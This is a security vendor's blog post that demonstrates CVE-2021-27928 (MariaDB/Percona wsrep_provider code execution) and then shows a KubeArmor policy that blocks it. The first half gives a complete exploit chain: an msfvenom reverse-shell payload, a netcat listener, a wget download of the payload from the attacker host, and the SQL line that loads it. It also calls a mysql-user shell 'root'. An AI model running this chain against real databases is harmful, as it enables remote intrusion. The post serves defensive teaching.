Introduction

Data is a critical asset of any company, and data protection is a critical component of business protection. Having a strong database security posture will enable you to protect your organization’s sensitive information from outsiders.

Every database has different threats, so we will see an insider threat where a malicious user can exploit remote code execution in Percona PMM Server. We will first learn about the vulnerability and walk through the exploit itself to see how we can protect it against.

Vulnerability Assessment

So, let us understand the vulnerability. Remote code execution is the core issue here. An untrusted search path leads to eval injection, in which a database SUPER user can execute OS commands after modifying wsrep_provider and wsrep_notify_cmd. To run this exploit, you can install any of the following versions below.

Prerequisites:

  1. MariaDB 10.2 before 10.2.37,

Or 10.3 before 10.3.28,

Or 10.4 before 10.4.18,

Or 10.5 before 10.5.9

2. Percona Server through 2021-03-03

The specific version has already been installed in our test-machine, as you can see below. [email protected] will be our victim machine.

[email protected]:~# mysql -V
mysql  Ver 15.1 Distrib 10.5.8-MariaDB, for debian-linux-gnu (x86_64) using  EditLine wrapper
Percona server

The Exploit?

We will connect to another machine and then will start with the exploitation. [email protected] will be the attacker’s machine.

Step 1:

Let's create our reverse shell payload with msfvenom. For our payload we will use /Linux/x64/shell_reverse_tcp.

[NOTE] Change LHOST to your IP address.

[email protected]:~# msfvenom -p linux/x64/shell_reverse_tcp LHOST=172.26.255.252 LPORT=8181 -f elf-so -o CVE-2021-27928.so
LHOST

Step 2:

Now we will use Netcat to listen to the specified port.

[email protected]:~# nc -lvp -8181                                               	 
listening on [any] 8181 ..

Netcat

Step 3:

We will copy the payload to the victim machine. Here we will be using the python HTTP server.

[email protected]:~# python3 -m http.server 8000                                    	 
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/)...
python HTTP server

Step 4:

Now let us get into the victim machine and download the payload. To do that just follow the commands below.

[email protected]:~# cd /tmp/

[email protected]:~# wget http://172.26.255.252:8000/CVE-2021-27928.so
--2022-01-19 11:42:44--  http://172.26.255.252:8000/CVE-2021-27928.so
Connecting to 172.26.255.252:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 476 [application/octet-stream]
Saving to: 'CVE-2021-27928.so.1'

CVE-2021-27928.so.1                       	100%[================================================================================================>] 	476  --.-KB/s	in 0s 	 

2022-01-19 11:42:44 (17.9 MB/s) - 'CVE-2021-27928.so.1' saved [476/476]

Commands

Step 5:

We will now execute the payload.

[email protected]:~# mysql -u root -p -h 127.0.0.1 -e 'SET GLOBAL wsrep_provider="/tmp/CVE-2021-27928.so";'
Enter password: 
ERROR 2013 (HY000) at line 1: Lost connection to MySQL server during query

Payload

Now let us check our listener we successfully obtained root shell access.

[email protected]:~# nc -lvp -8181                                               	 
listening on [any] 8181 ..
connect to [172.26.80.176] from kali.mshome.net [172.26.80.1] 3900

id
uid=104(mysql) gid=110(mysql) groups=110(mysql)

whoami
Mysql

ls
aria_log. 00000001
aria_log_control
debian-10.5.flag
ib_buffer_pool
Ib_logfiled
performance_schema

Root shell
MYSQL

Let us see how we can protect it using the KubeArmor security policy.

How to use KubeArmor on your VM

Below is a sample policy we are going to apply using KubeArmor. We also have sample policies for various different workloads, curated by Security Experts. Check out the following link to view our other Policy Templates.

# KubeArmor is an open source software that enables you to protect your cloud workload at run-time.
# To learn more about KubeArmor visit:
# https://www.accuknox.com/kubearmor

apiVersion: security.kubearmor.com/v1
kind: KubeArmorHostPolicy
metadata:
  name: vm-wsrep_provider-os-command-execution
spec:
  tags: ["VM", Percona-Server", "mysql", "Mariadb", "root-shell"]
  message: "payload execution is blocked"
  file:
    severity: 2
    matchPaths:
      - path: /usr/lib/galera/libgalera_smm.so
      - path: /tmp/CVE-2021-27928.so
    matchPatterns:
      - pattern: /**/**/usr/lib/galera/libgalera_smm.so
      - pattern: /**/**/CVE-2021-27928.so
    action: Block
  process:
    severity: 2
    matchPaths:
      - path: /usr/lib/galera/libgalera_smm.so
      - path: /tmp/CVE-2021-27928.so
      - path: /usr/bin/mysql
    matchPatterns:
      - pattern: /**/**/usr/lib/galera/libgalera_smm.so
      - pattern: /**/**/CVE-2021-27928.so
    action: Block

Kubearmor policy

We will save the file as vm-cve-2021-27928.yaml. To apply a VM policy just copy and paste the following command in your terminal.

karmor vm policy add vm-cve-2021-27928.yaml
VM policy
[email protected]:~# karmor vm policy add vm-cve-2021-27928.yaml
Success
VM policy

Once the policy is applied let us execute the payload and see what happens.

[email protected]:~# mysql -u root -p -h 127.0.0.1 -e 'SET GLOBAL wsrep_provider="/tmp/CVE-2021-27928.so";'
Enter password: 
ERROR 1126 (HY000) at line 1: Can't open shared library '/tmp/CVE-2021-27928.so' (errno: -1807791184, wsrep_init failed)
Root shell

It won’t open the dependencies used by wresp_provider and we won’t get the root shell access in the attacker machine and terminate the payload execution.

To check for logs just copy-paste the following command in your terminal.

karmor log --json	
{
  "Timestamp": 1642659437,
  "UpdatedTime": "2022-01-20T06:17:17.447160Z",
  "ClusterName": "Default",
  "HostName": "kali",
  "HostPID": 4316,
  "PPID": 4016,
  "PID": 4316,
  "PolicyName": "vm-wsrep_provider-os-command-execution",
  "Severity": "2",
  "Tags": "VM,Percona-Server\",mysql,Mariadb,root-shell",
  "Message": "payload execution is blocked",
  "Type": "MatchedHostPolicy",
  "Source": "bash",
  "Operation": "Process",
  "Resource": "/usr/bin/mysql -u root -p -e SET GLOBAL wsrep_provider=\"/tmp/CVE-2021-27928.so\";",
  "Data": "syscall=SYS_EXECVE",
  "Action": "Block",
  "Result": "Passed"
}
Logs
Code

Conclusion

In this blog, we have seen how single unwanted permission in a variable from your DB’s codebase could be abused to gain root access to your system. There are several other exploits too that can be used against when you're running an outdated version of any database. Hence the solution is to always keep your DB versions updated to the latest patch as soon as it’s released by the vendors.

KubeArmor is a cloud run-time security tool by AccuKnox that makes the job of detecting such vulnerabilities and patching them up easier when the manual updates take time. To learn more about AccuKnox and its products, check out the links below.

KubeArmor website: https://www.accuknox.com/kubearmor/

KubeArmor GitHub: https://github.com/kubearmor/KubeArmor

KubeArmor Slack: https://kubearmor.herokuapp.com/


Now you can protect your workloads in minutes using AccuKnox, it is available to protect your Kubernetes and other cloud workloads using Kernel Native Primitives such as AppArmor, SELinux, and eBPF.

Let us know if you are seeking additional guidance in planning your cloud security program.

Read more blogs from Cloud Security Category here.